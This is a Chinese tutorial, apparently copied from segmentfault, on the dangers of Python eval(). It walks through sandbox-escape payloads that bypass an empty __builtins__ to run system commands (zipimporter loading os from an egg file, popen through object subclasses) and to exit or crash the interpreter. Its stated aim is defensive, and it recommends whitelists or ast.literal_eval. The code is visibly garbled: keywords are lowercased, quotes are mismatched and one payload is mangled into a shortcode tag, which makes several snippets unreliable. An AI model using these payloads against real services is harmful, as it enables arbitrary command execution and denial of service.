eval前言
1
2
3
4
5
|
in [ 1 ]: eval ( "2+3" )
out[ 1 ]: 5
in [ 2 ]: eval ( '[x for x in range(9)]' )
out[ 2 ]: [ 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 ]
|
当内存中的内置模块含有os的话,eval同样可以做到命令执行:
1
2
3
4
5
|
in [ 3 ]: import os
in [ 4 ]: eval ( "os.system('whoami')" )
hy - 201707271917 \administrator
out[ 4 ]: 0
|
当然,eval只能执行python的表达式类型的代码,不能直接用它进行import操作,但exec可以。如果非要使用eval进行import,则使用__import__:
1
2
3
|
in [ 8 ]: eval ( "__import__('os').system('whoami')" )
hy - 201707271917 \administrator
out[ 8 ]: 0
|
在实际的代码中,往往有使用客户端数据带入eval中执行的需求。比如动态模块的引入,举个栗子,一个在线爬虫平台上爬虫可能有多个并且位于不同的模块中,服务器端但往往只需要调用用户在客户端选择的爬虫类型,并通过后端的exec或者eval进行动态调用,后端编码实现非常方便。但如果对用户的请求处理不恰当,就会造成严重的安全漏洞。
”安全”使用eval
现在提倡最多的就是使用eval的后两个参数来设置函数的白名单:
eval函数的声明为eval(expression[, globals[, locals]])
其中,第二三个参数分别指定能够在eval中使用的函数等,如果不指定,默认为globals()和locals()函数中 包含的模块和函数。
1
2
3
4
5
6
7
8
9
10
11
|
>>> import os
>>> 'os' in globals ()
true
>>> eval ( 'os.system(' whoami ')' )
win - 20140812chjadministrator
0
>>> eval ( 'os.system(' whoami ')' ,{},{})
traceback (most recent call last):
file "", line 1 , in
file "", line 1 , in
nameerror: name 'os' is not defined
|
如果指定只允许调用abs函数,可以使用下面的写法:
1
2
3
4
5
6
7
8
9
10
|
>>> eval ( 'abs(-20)' ,{ 'abs' : abs },{ 'abs' : abs })
20
>>> eval ( 'os.system(' whoami ')' ,{ 'abs' : abs },{ 'abs' : abs })
traceback (most recent call last):
file "", line 1 , in
file "", line 1 , in
nameerror: name 'os' is not defined
>>> eval ( 'os.system(' whoami ')' )
win - 20140812chjadministrator
0
|
使用这种方法来防护,确实可以起到一定的作用,但是,这种处理方法可能会被绕过,从而造成其他问题!
绕过执行代码1
被绕过的情景如下,小明知道了eval会带来一定的安全风险,所以使用如下的手段去防止eval执行任意代码:
1
2
3
4
5
6
7
8
|
env = {}
env[ "locals" ] = none
env[ "globals" ] = none
env[ "__name__" ] = none
env[ "__file__" ] = none
env[ "__builtins__" ] = none
eval (users_str, env)
|
python中的__builtins__是内置模块,用来设置内置函数的模块。比如熟悉的abs,open等内置函数,都是在该模块中以字典的方式存储的,下面两种写法是等价的:
1
2
3
4
|
>>> __builtins__. abs ( - 20 )
20
>>> abs ( - 20 )
20
|
我们也可以自定义内置函数,并像使用python中的内置函数一样使用它们:
1
2
3
4
5
|
>>> def hello():
... print 'shabi'
>>> __builtin__.__dict__[ 'say_hello' ] = hello
>>> say_hello()
shabi
|
小明将eval函数的作用域中的内置模块设置为none,好像看起来很彻底了,但依然可以被绕过。__builtins__是__builtin__的一个引用,在__main__模块下,两者是等价的:
1
2
3
4
|
>>> id (__builtins__)
3549136
>>> id (__builtin__)
3549136
|
根据乌云drops提到的方法,使用如下代码即可:
[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")
上面的代码首先利用__class__和__subclasses__动态加载了object对象,这是因为eval中无法直接使用object。然后使用object的子类的zipimporter对egg压缩文件中的configobj模块进行导入,并调用其内置模块中的os模块从而实现命令执行,当然,前提是要有configobj的egg文件。 configobj模块很有意思,居然内置了os模块:
1
2
3
4
5
6
7
8
9
10
11
|
>>> "os" in configobj.__dict__
true
>>> import urllib
>>> "os" in urllib.__dict__
true
>>> import urllib2
>>> "os" in urllib2.__dict__
true
>>> configobj.os.system( "whoami" )
win - 20140812chjadministrator
0
|
和configobj类似的模块如urllib,urllib2,setuptools等都有os的内置,理论上使用哪个都行。 如果无法下载egg压缩文件,可以下载带有setup.py的文件夹,加入:
1
|
from setuptools import setup, find_packages
|
然后执行:
1
|
python setup.py bdist_egg
|
就可以在dist文件夹中找到对应的egg文件。 绕过demo如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
|
>>> env = {}
>>> env[ "locals" ] = none
>>> env[ "globals" ] = none
>>> env[ "__name__" ] = none
>>> env[ "__file__" ] = none
>>> env[ "__builtins__" ] = none
>>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('e:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"
>>> eval (users_str, env)
win - 20140812chjadministrator
0
>>> eval (users_str, {}, {})
win - 20140812chjadministrator
0
|
拒绝服务攻击1
object的子类中有很多有趣的东西,执行以下代码查看:
[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]
这里我就不输出结果了,如果你执行的话,可以看到很多有趣的模块,比如file,zipimporter,quitter等。经过测试,file的构造函数是被解释器沙箱隔离的。 简单的,或者直接使object暴露出的子类quitter进行退出:
1
2
|
>>> eval ("[x for x in ().__class__.__bases__[ 0 ].__subclasses__() if x.__name__
= = 'quitter' ][ 0 ]( 0 )()", { '__builtins__' :none})
|
c:/>
如果运气好,遇到对方程序中导入了os等敏感模块,那么popen就可以用,并且绕过__builins__为空的限制,例子如下:
1
2
3
4
5
|
>>> import subprocess
>>> eval ( "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'popen'][0](['ping','-n','1','127.0.0.1'])" ,{ '__builtins__' :none})
>>>
正在 ping 127.0 . 0.1 具有 32 字节的数据:<br>来自 127.0 . 0.1 的回复: 字节 = 32 时间>>
|
事实上,这种情况非常多,比如导入os模块,一般用来处理路径问题。所以说,遇到这种情况,完全可以列举大量的功能函数,来探测目标object的子类中是否含有一些危险的函数可以直接使用。
拒绝服务攻击2
同样,我们甚至可以绕过__builtins__为none,造成一次拒绝服务攻击,payload(来自老外blog)如下:
>>> eval('(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"kaboom",(),(),(),"","",0,""),{})())()', {"__builtins__":none})
运行上面的代码,python直接crash掉了,造成拒绝服务攻击。 原理是通过嵌套的lambda来构造一片代码段,即code对象。为这个code对象分配空的栈,并给出相应的代码字符串,这里是kaboom,在空栈上执行代码,会出现crash。构造完成后,调用fc函数即可触发,其思路不可谓不淫荡。
总结
从上面的内容我们可以看出,单单将内置模块置为空,是不够的,最好的机制是构造白名单,如果觉得比较麻烦,可以使用ast.literal_eval代替不安全的eval。
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持服务器之家。
原文链接:https://segmentfault.com/a/1190000011532358